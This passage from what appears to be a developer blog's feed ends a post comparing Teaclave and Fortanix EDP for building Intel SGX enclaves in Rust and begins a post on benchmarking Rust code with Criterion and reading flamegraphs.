&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let str_slice = unsafe { slice::from_raw_parts(some_string, some_len) };&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; A sample &amp;amp;&amp;#39;static string&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let rust_raw_string = &amp;quot;This is a in-Enclave &amp;quot;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Construct a string from &amp;amp;&amp;#39;static string&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut hello_string = String::from(rust_raw_string);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Ocall to normal world for output&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;println!(&amp;quot;{}&amp;quot;, &amp;amp;hello_string);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;sgx_status_t::SGX_SUCCESS&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;And there’s even more. You need to define the &lt;code&gt;[E]call&#x2F;[O]call&lt;&#x2F;code&gt; interface in the enclave subdirectory in an &lt;code&gt;Enclave.edl&lt;&#x2F;code&gt; file.&lt;&#x2F;p&gt;
&lt;p&gt;It would look something like:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;enclave {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    from &amp;quot;sgx_tstd.edl&amp;quot; import *;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; you would have other imports here&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trusted {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;* define ECALLs here. *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        public sgx_status_t say_something([in, size=len] const uint8_t* some_string, size_t len);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    };&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    untrusted {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;* define OCALLs here. *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;There are even more files we haven’t touched yet, but this is enough to show that while Teaclave might give you a lot of control over what’s going on, it’s not easy to use and increases the overall complexity of your project.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;same-implementation-using-fortanix-edp&quot;&gt;Same implementation using Fortanix EDP&lt;&#x2F;h3&gt;
&lt;p&gt;As Fortanix’s documentation says:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;EDP applications should be thought of as providing a service to other parts of your system. An EDP application might interact with other services which themselves might be EDP applications. The service may be implemented as a gRPC server, an HTTPS server with REST APIs, or any other service protocol.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer&lt;&#x2F;strong&gt;: we haven’t been able to get our hands on an Intel SGX-capable machine, hence we weren’t able to test this example. However, we think it serves as a good illustration, and it gives some credit to Teaclave and Intel for their simulation capabilities.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s see how we can accomplish our hello world using Fortanix EDP. Our final project looks like this:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;8Wh6Nk4.png&quot; alt=&quot;&quot; &#x2F;&gt;Example of a project structure using Fortanix&lt;&#x2F;p&gt;
&lt;p&gt;First, we needed to add these two lines to the &lt;code&gt;.cargo&#x2F;config&lt;&#x2F;code&gt; file:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[target.x86_64-fortanix-unknown-sgx]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;runner=&amp;#39;ftxsgx-runner-cargo&amp;#39;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;And that’s the only setup we needed (besides the Rust code). Now let’s look at what the &lt;code&gt;main.rs&lt;&#x2F;code&gt; has to offer:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use std::net::{TcpListener, TcpStream};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use std::io::Read;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn main() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let listener = TcpListener::bind(&amp;quot;127.0.0.1:7878&amp;quot;).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let (mut stream, _addr) = listener.accept().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut message = [0; 128];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    stream.read(&amp;amp;mut message).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    println!(&amp;quot;new client: {:?}&amp;quot;, std::str::from_utf8(&amp;amp;message).unwrap());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Pretty much like good ol’ Rust code, right? In fact, we’re able to compile and run it without the Fortanix runner.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;GPPD8IR.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;This only constitutes the enclave, but an easy way to test it is to make a TCP request, so running the following command should be enough:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;echo &amp;quot;Hello World!&amp;quot; | nc 127.0.0.1 7878&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The way this is built means that you could call it from another language as long as you can make a TCP connection.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;sgx_with_rust_blog_post&quot;&gt;&lt;em&gt;Full code here&lt;&#x2F;em&gt;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
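&lt;p&gt;As a sketch, a minimal Rust client for talking to that enclave service could look like this (the function name is made up; the address is whatever the enclave runner exposes, &lt;code&gt;127.0.0.1:7878&lt;&#x2F;code&gt; in our example):&lt;&#x2F;p&gt;

```rust
use std::io::Write;
use std::net::TcpStream;

// Connect to the enclave service and send it a message over plain TCP.
// In production you would wrap this stream in TLS, as recommended earlier.
fn send_message(addr: &str, msg: &str) -> std::io::Result<()> {
    let mut stream = TcpStream::connect(addr)?;
    stream.write_all(msg.as_bytes())?;
    Ok(())
}
```

&lt;p&gt;Any language with a socket API could do the same, which is what makes this service-style interface convenient.&lt;&#x2F;p&gt;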
&lt;h2 id=&quot;teaclave-vs-fortanix&quot;&gt;Teaclave vs. Fortanix&lt;&#x2F;h2&gt;
&lt;p&gt;One significant difference between the two is their size: Teaclave’s repo contains ~80K lines of Rust code while Fortanix’s has ~18K lines, about 4 times less. Some of this could be attributed to the number of examples Teaclave has in its repo, but that still doesn’t make up for the whole difference.&lt;br &#x2F;&gt;
Also, Fortanix is mostly written in Rust, while Teaclave has another 80K lines of non-Rust code… yikes!&lt;&#x2F;p&gt;
&lt;p&gt;In terms of community activity, we ran a comparison of both through &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;vesoft-inc.github.io&#x2F;github-statistics&#x2F;&quot;&gt;github-statistics&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;bejTcAq.png&quot; alt=&quot;&quot; &#x2F;&gt;Comparison between Fortanix and Teaclave repos stats&lt;&#x2F;p&gt;
&lt;p&gt;Teaclave seems to have more traction based on the number of stars and forks. Nevertheless, during 2021 there was a clear increase in activity in Fortanix’s EDP repository. So it seems that Teaclave is more widely used but its development has stagnated somewhat, while Fortanix is taking the lead, a dynamic that has been reinforced since the target attained &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;users.rust-lang.org&#x2F;t&#x2F;sgx-target-is-now-a-rust-tier-2-platform&#x2F;24779&quot;&gt;Rust tier 2 in January 2019&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;weighting-pros-and-cons&quot;&gt;Weighing the pros and cons&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;teaclave-2&quot;&gt;Teaclave&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;✅ Uses Intel’s libs, and they’re supposed to be the experts on that.&lt;&#x2F;li&gt;
&lt;li&gt;✅ There are simulation libraries which expand the support a bit.&lt;&#x2F;li&gt;
&lt;li&gt;✅ Already solves connecting the app and the enclave.&lt;&#x2F;li&gt;
&lt;li&gt;✅ There are a few more examples available (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;apache&#x2F;incubator-teaclave-sgx-sdk&#x2F;tree&#x2F;master&#x2F;samplecode&quot;&gt;Teaclave SGX SDK repo&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;glassonion1&#x2F;rust-101&#x2F;tree&#x2F;main&#x2F;sgx-sdk&quot;&gt;Rust 101 repo&lt;&#x2F;a&gt;).&lt;&#x2F;li&gt;
&lt;li&gt;❌ Uses Intel’s libs. This might not be a bad thing by itself, but you could think of it as adding a dependency on a centralized entity such as Intel, which might not be ideal in a decentralized environment (debatable).&lt;&#x2F;li&gt;
&lt;li&gt;❌ Integrating SGX into an existing system using this SDK is a bit tedious, since you need to restructure your application, write Makefiles to handle linking the enclave with the application, declare the interface connecting your applications in a separate &lt;code&gt;.edl&lt;&#x2F;code&gt; file with its own syntax, and more.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;vMOMK15.png&quot; alt=&quot;&quot; &#x2F;&gt;Enclave folder using Teaclave vs Fortanix&lt;&#x2F;p&gt;
&lt;h3 id=&quot;fortanix&quot;&gt;Fortanix&lt;&#x2F;h3&gt;
&lt;ul&gt;
&lt;li&gt;✅ You can write all Rust code.&lt;&#x2F;li&gt;
&lt;li&gt;✅ Officially a tier 2 target of the Rust compiler.&lt;&#x2F;li&gt;
&lt;li&gt;✅ Add a few lines to your &lt;code&gt;Cargo.toml&lt;&#x2F;code&gt; and you are set.&lt;&#x2F;li&gt;
&lt;li&gt;✅ We trust the fact that it is open source and therefore audited by many users, and being included as a tier 2 target for the Rust compiler means that it has earned some respect from the Rust community as well.&lt;&#x2F;li&gt;
&lt;li&gt;❌ Well, sometimes it’s not that easy. Not all crates have support for SGX, although you can add your own implementation for the Fortanix target.&lt;&#x2F;li&gt;
&lt;li&gt;❌ Since it uses &lt;code&gt;libstd&lt;&#x2F;code&gt;, it assumes that you have implementations for &lt;code&gt;time&#x2F;net&#x2F;env&#x2F;thread&#x2F;process&#x2F;fs&lt;&#x2F;code&gt;, which SGX does not entirely support. These will generate runtime panics when used; you won’t get compilation errors.&lt;&#x2F;li&gt;
&lt;li&gt;❌ It’s easier to develop on, but that’s because it hides some of the complexity away, and you may ask yourself whether you can trust its security when so much is hidden from the developer.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h2 id=&quot;conclusions&quot;&gt;Conclusions&lt;&#x2F;h2&gt;
&lt;p&gt;We don’t find a clear winner between Teaclave and Fortanix, as both have their pros and cons.&lt;&#x2F;p&gt;
&lt;p&gt;Having to make a choice, we tend to go with Fortanix, as it’s easier to develop in pure Rust. Also, since Fortanix is endorsed as a tier 2 target, we can have high confidence in its compatibility with our software, allowing for a seamless implementation. As an added bonus, this level of trust from the Rust developers gives us a somewhat indirect clue that there aren’t blatant security issues hidden in the code meaningful enough to make us doubt it.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;further-readings&quot;&gt;Further readings&lt;&#x2F;h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.intel.com&#x2F;content&#x2F;dam&#x2F;develop&#x2F;public&#x2F;us&#x2F;en&#x2F;documents&#x2F;intel-sgx-product-brief-2019.pdf&quot;&gt;SGX product brief&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.intel.com&#x2F;content&#x2F;www&#x2F;us&#x2F;en&#x2F;developer&#x2F;library.html?s=Newest&amp;amp;f:@stm_10309_en=%5BIntel%C2%AE%20Software%20Guard%20Extensions%20(Intel%C2%AE%20SGX)%5D&quot;&gt;Intel technical library - Software Guard Extensions&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;fortanix.com&#x2F;intel-sgx&#x2F;&quot;&gt;Fortanix resources&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;teaclave.apache.org&#x2F;docs&#x2F;&quot;&gt;Teaclave documentation&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
</description>
      </item>
      <item>
          <title>Benchmarking and analyzing Rust code performance with Criterion and Iai</title>
          <pubDate>Sat, 30 Apr 2022 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/benchmarking-and-analyzing-rust-performance-with-criterion-and-iai/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/benchmarking-and-analyzing-rust-performance-with-criterion-and-iai/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/benchmarking-and-analyzing-rust-performance-with-criterion-and-iai/">&lt;p&gt;At &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;ClassLambda&quot;&gt;LambdaClass&lt;&#x2F;a&gt; we are big fans of reading, discussing and implementing distributed systems, compilers, drivers. The last few years we also got our hands dirty with reverse engineering and embedded systems development. Based on our interests it shouldn’t be a surprise that we have been using Rust for quite some time. Rust is one of a kind.&lt;&#x2F;p&gt;
&lt;p&gt;Correctness and performance are the main reasons we choose Rust for developing many of our applications. Rust’s compiler is a great tool to find bugs. The compiler can help a lot on the performance front, but in the end you need to measure your running code. You need to know the bottlenecks in your code in order to solve them.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we’ll talk about our experience doing benchmarks in Rust, what tools we used and why it was important for us. Usually a fully optimized function is harder to read than a simpler and slower one. Optimization is something that you’ll have to balance with readability and maintenance costs: sadly, we can’t have our cake and eat it too in this case.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;why-benchmarking&quot;&gt;Why Benchmarking?&lt;&#x2F;h2&gt;
&lt;p&gt;A lot of new developers are starting to use Rust without having been exposed to benchmarking before. Just because Rust is fast and memory-efficient doesn’t mean that your code will be fast as well. The features that make Rust what it is come at a great cost if we don’t know how to use them properly. With great power comes great responsibility. These costs are mostly performance costs.&lt;&#x2F;p&gt;
&lt;p&gt;In our specific case, we worked with a function that iterates over a range of numbers and uses them to create some data structures that are later used in another process. Sometimes this number range can be pretty big, so we wanted this function to be very efficient.&lt;&#x2F;p&gt;
&lt;p&gt;But how do we know if this function is fast enough, or at least takes the expected amount of time for our process?&lt;&#x2F;p&gt;
&lt;p&gt;Well, that’s the reason why we started benchmarking. We needed to know how much time it was taking to iterate and create all the structures, so we started researching benchmarking and how we could do that in Rust.&lt;&#x2F;p&gt;
&lt;p&gt;If you search for how to benchmark in Rust, the first result you’ll probably get is “Criterion”. Recently, Rust published a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;blog.rust-lang.org&#x2F;inside-rust&#x2F;2022&#x2F;04&#x2F;04&#x2F;lang-roadmap-2024.html&quot;&gt;roadmap for 2024&lt;&#x2F;a&gt; where they mentioned the possibility of adopting Criterion officially.&lt;&#x2F;p&gt;
&lt;p&gt;It’s worth mentioning that Rust comes with a built-in benchmarking feature, but it is currently unstable, as noted in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;doc.rust-lang.org&#x2F;nightly&#x2F;cargo&#x2F;commands&#x2F;cargo-bench.html?highlight=feature&quot;&gt;Rust documentation&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-is-criterion&quot;&gt;What is Criterion?&lt;&#x2F;h2&gt;
&lt;p&gt;Criterion is an open-source library, ported from the original &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;haskell&#x2F;criterion&quot;&gt;Haskell Criterion library&lt;&#x2F;a&gt;, with some sophisticated tools to do micro-benchmarks in Rust. By micro-benchmarking, we refer to measuring the performance of small parts of our process, like one or two functions (more on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stackoverflow.com&#x2F;a&#x2F;2842707&quot;&gt;micro-benchmarking&lt;&#x2F;a&gt;). Benchmarking with Criterion gives you a general overview of the time that is spent on a task. This is known as &lt;strong&gt;wall time&lt;&#x2F;strong&gt;: the time interval between the moment the task starts and the moment it finishes. We’ll get to this later.&lt;br &#x2F;&gt;
We started playing with Criterion and discovered some awesome features for our analysis:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Criterion makes some graphics to help you visualize the time that your function takes and generates a report with those graphics.&lt;&#x2F;li&gt;
&lt;li&gt;It gives automatic comparisons between the last run of the benchmark and a new run with your changes, to see whether your function’s performance has improved or regressed.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
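&lt;p&gt;To make the wall-time idea concrete, this is what a naive measurement by hand looks like using only the standard library; Criterion automates the warm-up, repeated sampling and statistics on top of exactly this kind of timing (the workload function here is a made-up stand-in):&lt;&#x2F;p&gt;

```rust
use std::time::Instant;

// Made-up stand-in workload.
fn sum_of_squares(n: u64) -> u64 {
    (1..=n).map(|x| x * x).sum()
}

fn main() {
    // Wall time: the interval between starting the task and finishing it.
    let start = Instant::now();
    let result = sum_of_squares(10_000);
    let elapsed = start.elapsed();
    println!("result = {}, took {:?}", result, elapsed);
}
```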
&lt;p&gt;Furthermore, Criterion is pretty programmer-friendly. So you don’t need any external tools or a hard setup to start.&lt;&#x2F;p&gt;
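&lt;p&gt;As a sketch of how little setup that is (the crate version, file names and benchmark names here are assumptions, based on Criterion’s documented usage):&lt;&#x2F;p&gt;

```toml
# Cargo.toml
[dev-dependencies]
criterion = "0.4"

[[bench]]
name = "my_benchmark"
harness = false
```

```rust
// benches/my_benchmark.rs
use criterion::{criterion_group, criterion_main, Criterion};
use std::hint::black_box;

// Made-up workload; replace with the function you want to measure.
fn sum_of_squares(n: u64) -> u64 {
    (1..=n).map(|x| x * x).sum()
}

fn bench_sum(c: &mut Criterion) {
    // `black_box` keeps the compiler from optimizing the call away.
    c.bench_function("sum_of_squares 1000", |b| {
        b.iter(|| sum_of_squares(black_box(1000)))
    });
}

criterion_group!(benches, bench_sum);
criterion_main!(benches);
```

&lt;p&gt;Running &lt;code&gt;cargo bench&lt;&#x2F;code&gt; then takes care of the rest.&lt;&#x2F;p&gt;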
&lt;h2 id=&quot;analyzing-criterion-results&quot;&gt;Analyzing Criterion results&lt;&#x2F;h2&gt;
&lt;p&gt;We’ve mentioned graphic tools, visualizations, and comparisons that Criterion makes to help us understand the results, but how does that look?&lt;&#x2F;p&gt;
&lt;p&gt;Well, you have two ways to read the results provided by Criterion, one is the Command-Line Output and the other one is the generated &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;bheisler.github.io&#x2F;criterion.rs&#x2F;book&#x2F;user_guide&#x2F;html_report.html&quot;&gt;HTML report&lt;&#x2F;a&gt; with distribution plots and other resources.&lt;&#x2F;p&gt;
&lt;p&gt;The CLI output looks like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmarking Get Blocks Function&#x2F;benches&#x2F;samples&#x2F;.ledger-2-4: Warming up for 3.0000 s&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Get Blocks Function&#x2F;benches&#x2F;samples&#x2F;.ledger-2-4                                                                          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                        time:   [55.239 s 55.443 s 55.653 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Found 1 outliers among 10 measurements (10.00%)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  1 (10.00%) high mild&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;slowpoke-slow.gif&quot; alt=&quot;&quot; &#x2F;&gt;Graphic depiction of our results&lt;&#x2F;p&gt;
&lt;p&gt;This is what we first saw when we ran &lt;code&gt;cargo bench&lt;&#x2F;code&gt;: the measured time (the three values are the lower bound, estimate, and upper bound of the confidence interval) and the outliers encountered among the runs.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;KTm8I6O.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;htmlpreview.github.io&#x2F;?https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;how_to_benchmark_blogpost&#x2F;blob&#x2F;main&#x2F;report&#x2F;first_report_example.html&quot;&gt;HTML report example of our function&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Here we have an example of the HTML report that we also obtained when we used &lt;code&gt;cargo bench&lt;&#x2F;code&gt;. You can find this report on &lt;code&gt;target&#x2F;criterion&#x2F;report&#x2F;index.html&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Surely you noticed that the first output says “10 measurements”. The reason is that Criterion executes the function we want to benchmark several times, and the final result is the mean time among all of those runs. Criterion’s default sample size is 100; we changed it to 10 because our function takes a long time on its own, and collecting 100 samples would take far too long.&lt;&#x2F;p&gt;
&lt;p&gt;This was the report for our function creating 400 of these structures, and it was considerably worse than what we were expecting.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;well-what-s-next&quot;&gt;Well, what’s next?&lt;&#x2F;h2&gt;
&lt;p&gt;So far, Criterion helped us measure how much execution time that function takes (on average). Is this enough to improve our implementation? Criterion tells us how long a function takes to run, but it doesn’t tell us where that time is spent. This is when we started to think about profiling.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;start-profilling-and-beyond-criterion&quot;&gt;Start profiling and beyond Criterion&lt;&#x2F;h2&gt;
&lt;p&gt;Profiling tells us more about the actual implementation of the function we want to improve. There are different tools and techniques that help us profile our code.&lt;&#x2F;p&gt;
&lt;p&gt;We wanted a graphical way to understand the performance issues in our code, so we started researching &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.brendangregg.com&#x2F;flamegraphs.html&quot;&gt;FlameGraphs&lt;&#x2F;a&gt;, a visualization created by Brendan Gregg, one of the great masters of computing performance analysis. Flamegraphs are built from data gathered by the &lt;code&gt;perf&lt;&#x2F;code&gt; tool, a Linux command-line tool for performance analysis of applications.&lt;&#x2F;p&gt;
&lt;p&gt;Thankfully Rust has a crate called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;flamegraph-rs&#x2F;flamegraph&quot;&gt;&lt;code&gt;flamegraph&lt;&#x2F;code&gt;&lt;&#x2F;a&gt; that works with &lt;code&gt;cargo&lt;&#x2F;code&gt; and it’s pretty easy to use.&lt;&#x2F;p&gt;
&lt;p&gt;In a flamegraph, you can see all the function calls and how much time each one consumes in the whole process, including calls from the Rust standard library.&lt;br &#x2F;&gt;
Ours looked a little bit like this:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;PvYguTf.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;a href=&quot;&#x2F;images&#x2F;external&#x2F;first_flamegraph_example.svg&quot;&gt;Flamegraph of our function&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I know, right?&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;calculating-meme-template-047hp.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;analyzing-flamegraph-results&quot;&gt;Analyzing flamegraph results&lt;&#x2F;h2&gt;
&lt;p&gt;Each box represents a function in the stack. The x-axis spans the sample population; &lt;strong&gt;it does not show the passing of time from left to right&lt;&#x2F;strong&gt;. The width of a box is proportional to the total time that function was on-CPU, or was part of an ancestry that was on-CPU (wider rectangles mean more time spent). And if you are wondering whether the colors have some meaning, the answer is no; they only give the graphic its flame aspect.&lt;&#x2F;p&gt;
